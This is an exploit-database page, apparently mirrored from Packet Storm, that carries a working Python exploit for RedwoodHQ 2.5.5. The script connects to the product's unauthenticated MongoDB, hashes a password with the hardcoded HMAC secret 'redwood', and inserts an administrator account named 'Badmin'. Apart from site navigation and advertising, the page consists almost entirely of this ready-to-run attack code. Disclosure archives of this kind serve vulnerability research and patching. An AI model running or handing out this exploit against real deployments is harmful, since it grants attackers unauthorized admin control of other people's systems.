Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RedwoodHQ 2.5.5 Authentication Bypass

🗓️ 16 Jun 2019 00:00:00Reported by EthicalHCOPType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 77 Views

RedwoodHQ 2.5.5 Authentication Bypass exploit to create admin user without authenticatio

Code
`# -*- encoding: utf-8 -*-  
#!/usr/bin/python3  
  
# Exploit Title: RedxploitHQ (Create Admin User by missing authentication on db)  
# Date: 14-june-2019  
# Exploit Author: EthicalHCOP  
# Version: 2.0 / 2.5.5  
# Vendor Homepage: https://redwoodhq.com/  
# Software Link: https://redwoodhq.com/redwood-download/  
# Tested on: Ubuntu and Windows.  
# Twitter: @EthicalHcop  
# Usage: python3 RedxploitHQ.py -H mongo_host -P mongo_port  
# Description: Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework  
#   
# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have her own Mongo Launcher.   
# The problem is that this vendor database doesn't require any authentication to read her data.   
# So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool  
#   
# POC: https://youtu.be/MK9AvoJDtxY  
  
import hashlib  
import hmac  
import optparse  
from pymongo import MongoClient  
  
def CreateHMAC(Pass):  
message = bytes(Pass,encoding='utf8')  
secret = bytes('redwood',encoding='utf8')  
hash = hmac.new(secret, message, hashlib.md5)  
return (hash.hexdigest())  
  
def DbConnect(ip,port):  
uri = "mongodb://" + ip + ":" + port + "/"  
con = MongoClient(uri)  
return con  
  
def DbDisconnect(con):  
con.close()  
  
def CreateBadminUser(ip, port, user, passw):  
con = DbConnect(ip, port)  
db = con.automationframework  
usr = db.users  
passw = CreateHMAC(passw)  
data = {  
"name": user,  
"password": passw,  
"tag": [],  
"role": "Admin",  
"username": user,  
"status": ""  
}  
usr.insert_one(data)  
DbDisconnect(con)  
  
def start():  
parser = optparse.OptionParser('usage %prog ' + \  
'-H host -P port')  
parser.add_option('-P', '--Port', dest='port', type='string', \  
help='MongoDB Port')  
parser.add_option('-H', '--Host', dest='host', type='string', \  
help='MongoDB Host')  
(options, args) = parser.parse_args()  
ip = options.host  
port = options.port  
if (str(ip) == "None"):  
print("Insert Host")  
exit(0)  
if (str(port) == "None"):  
port = "27017"  
try:  
CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')  
print("[+] New user 'Badmin'/'Badmin' created.")  
except Exception as e:  
print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))  
  
if __name__ == '__main__':  
start()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Jun 2019 00:00Current
1Low risk
Vulners AI Score1
redwoodhqversion 2.5.5authentication bypasscreate admin usermongodbvendor homepageethicalhcopubuntuwindowsexploitpython3pocmongodb portmongodb hostbadmin user
77